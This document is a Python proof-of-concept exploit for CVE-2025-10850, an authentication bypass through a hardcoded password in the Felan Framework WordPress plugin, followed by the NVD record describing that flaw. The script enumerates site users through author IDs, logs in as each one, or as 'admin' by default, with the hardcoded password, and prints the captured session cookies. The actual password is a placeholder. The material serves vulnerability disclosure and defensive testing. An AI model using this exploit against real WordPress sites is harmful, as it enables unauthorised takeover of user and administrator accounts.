CVE-2025-10850

# CVE-2025-10850 PoC - Felan Framework Hardcoded Password Authentication Bypass # Vulnerability: Hardcoded password in fb_ajax_login_or_register and google_ajax_login_or_register functions # Affected: Felan Framework <= 1.1.4 import requests import re TARGET_URL = "http://target-wordpress-site.com" HARDCODED_PASSWORD = "[HARDCODED_PASSWORD_FROM_SOURCE]" # The hardcoded password found in plugin source code def exploit_auth_bypass(target_url, username, password): """ Exploit the hardcoded password vulnerability to authenticate as any user who registered via Facebook or Google social login. """ session = requests.Session() # Step 1: Get the login page to retrieve any necessary cookies/nonce login_page = session.get(f"{target_url}/wp-login.php") # Step 2: Attempt login with the hardcoded password login_data = { 'log': username, 'pwd': password, 'wp-submit': 'Log In', 'redirect_to': f'{target_url}/wp-admin/', 'testcookie': '1' } # Step 3: Set the test cookie as required by WordPress session.cookies.set('wordpress_test_cookie', 'WP%20Cookie%20check') # Step 4: Submit login request response = session.post( f"{target_url}/wp-login.php", data=login_data, allow_redirects=False ) # Step 5: Check if login was successful if 'wordpress_logged_in' in session.cookies.get_dict(): print(f"[+] Successfully authenticated as: {username}") print(f"[+] Session cookies: {session.cookies.get_dict()}") return True elif response.status_code == 302 and 'wp-admin' in response.headers.get('Location', ''): print(f"[+] Login successful (redirect detected) as: {username}") return True else: print(f"[-] Login failed for: {username}") return False def enumerate_and_exploit(target_url): """ Enumerate WordPress users and attempt authentication bypass """ session = requests.Session() # Enumerate users via WordPress REST API or author enumeration for user_id in range(1, 20): try: resp = session.get(f"{target_url}/?author={user_id}") username_match = re.search(r'author/([^/]+)/', resp.url) if resp.url else None if username_match: username = username_match.group(1) print(f"[*] Found user: {username}") exploit_auth_bypass(target_url, username, HARDCODED_PASSWORD) except Exception as e: continue if __name__ == "__main__": # Direct exploitation with known username exploit_auth_bypass(TARGET_URL, "admin", HARDCODED_PASSWORD) # Or enumerate and exploit all users # enumerate_and_exploit(TARGET_URL)

{"cve": {"id": "CVE-2025-10850", "sourceIdentifier": "[email protected]", "published": "2025-10-16T07:15:32.897", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Felan Framework plugin for WordPress is vulnerable to improper authentication in versions up to, and including, 1.1.4. This is due to the hardcoded password in the 'fb_ajax_login_or_register' function and in the 'google_ajax_login_or_register' function. This makes it possible for unauthenticated attackers to log in as any existing user on the site, if they registered with facebook or google social login and did not change their password. CVE-2025-23504 is likely a duplicate of this issue."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-798"}]}], "references": [{"url": "https://themeforest.net/item/felan-freelance-marketplace-and-job-board-wordpress-theme/53612955", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/ab4c7656-544c-4f2f-a42f-264ac90e3b61?source=cve", "source": "[email protected]"}]}}